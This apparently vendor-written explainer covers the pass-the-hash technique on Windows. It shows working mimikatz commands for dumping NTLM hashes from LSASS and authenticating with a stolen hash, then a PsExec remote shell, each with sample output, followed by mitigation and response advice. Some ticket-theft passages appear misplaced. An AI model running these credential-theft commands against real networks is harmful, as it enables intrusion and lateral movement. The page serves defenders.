Pass-the-Hash

Pass-the-Hash

Once an adversary has gained a foothold in the network, their tactics shift to compromising additional systems and obtaining the privileges they need to complete their mission. Pass-the-hash is a credential theft and lateral movement technique in which an attacker can abuse the challenge-and-response nature of the NTLM authentication protocol to authenticate as a user with only the NTLM hash of the user’s password. The attacker is thus able to use the compromised account without ever obtaining or brute-forcing the plaintext password. Password hashes normally only change when the password itself is changed, granting the adversary significant time to abuse the compromised user(s).

Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. TGS tickets enable an adversary to access a specific resource described in the ticket, and can be stolen without administrative privileges. TGT’s are more valuable as they are used to request TGS tickets, but require the threat actor to have gained administrative privileges on the computer from which it can be stolen.

Threat Summary

Target:

LM and NTLM-enabled Windows endpoints

ATT&CK® Tactic:

ATT&CK Technique:

Difficulty

Detect:

Hard

Mitigate:

Hard

Respond:

Medium

How Pass-the-Hash Works

Hover to see each step

Step 1: There are a number of methods by which an adversary can obtain password hashes once they have gained a foothold in a network. The most common of these is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. In order for this technique to work, the adversary must have compromised administrative privileges to the computer (e.g. the user that opened their phishing email is an administrator of their workstation).

The following example shows an adversary dumping hashes from LSASS. However, it is possible to obtain password hashes in other ways, such as DCSync and extracting hashes from NTDS.dit.

PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"
 
Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session           : RemoteInteractive from 2
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 09/07/2020 10:31:19
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
        msv :
         [00000003] Primary
         * Username : joed
         * Domain   : DOMAIN
         * NTLM     : eed224b4784bb040aab50b8856fe9f02
         * SHA1     : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
         * DPAPI    : e75e04767f812723a24f7e6d91840c1d
        tspkg :
        wdigest :
         * Username : joed
         * Domain   : DOMAIN
         * Password : (null)
        kerberos :
         * Username : joed
         * Domain   : domain.com
         * Password : (null)
        ssp :
        credman :

Step 2: Next, the adversary uses the stolen password hash and the pass-the-hash technique to authenticate as the compromised user. While this example demonstrates using the stolen password hash to launch cmd.exe, it is also possible to pass-the-hash directly over the wire to any accessible resource permitting NTLM authentication.

To pass-the-hash using mimikatz sekurlsa::pth the following parameters are specified:

  • /user: the compromised user’s username
  • /domain: the FQDN of the domain if using a domain account; or, “.” if using a local account
  • /ntlm:/aes128:, or /aes256: the stolen NTLM, AES-128, or AES-256 password hash
PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"
 
user    : JoeD
domain  : domain.com
program : cmd.exe
impers. : no
NTLM    : eed224b4784bb040aab50b8856fe9f02
  |  PID  11560
  |  TID  10044
  |  LSA Process is now R/W
  |  LUID 0 ; 58143370 (00000000:0377328a)
  \_ msv1_0   - data copy @ 000001AE3DDE8A30 : OK !
  \_ kerberos - data copy @ 000001AE3DECE9E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001AE3DFEC428 (32) -> null
 
# New CMD Window Opens

Step 3: Next, an adversary will use their newly acquired privileges to further their objectives. Tools like PSExec may be used to execute commands on remote systems, enabling the attacker to expand their footprint and repeat the cycle of credential theft and lateral movement on an ever growing number of systems.

PS> .\PSExec.exe \\server1 cmd.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>hostname
server1

Detect, Mitigate, and Respond

Difficulty: Hard

Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.

  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
  • Remove users’ administrator privileges from their workstations, limiting an adversaries ability to execute malware and removing the privileges needed to extract hashes from LSASS.exe.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential’s value to an adversary seeking to use it for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
  • Randomize and store local administrator passwords using a solution like Microsoft’s Local Administrator Password Solution (LAPS). This reduces an adversary’s ability to move laterally with local accounts that share the same password.
  • Do not permit local accounts to authenticate over the network. This reduces an adversary’s ability to move laterally with local accounts that share the same password. Two new well-known SIDS were added in Windows 8.1 and Windows 2012R2 and can be used in group policies for this purpose. The SID S-1-5-113 will apply to any local account, while the SID S-1-5-114 will apply to any local account that is also a member of the local Administrators group.
  • Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
  • Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which other. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.

Difficulty: Hard

While pass-the-ticket cannot be entirely eliminated, the best mitigations focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:

  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.

Difficulty: Medium

Should a suspected pass-the-hash be detected, there are several actions one can take to immediately respond:

  • Activate the incident response process and alert the response team.
  • Reset the password for the compromised user, which causes the stolen password hash to become invalid.
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities. Analyze logging to determine whether this computer is patient zero or whether the attacker pivoted to this machine from elsewhere, and whether the attacker pivoted from this machine to another.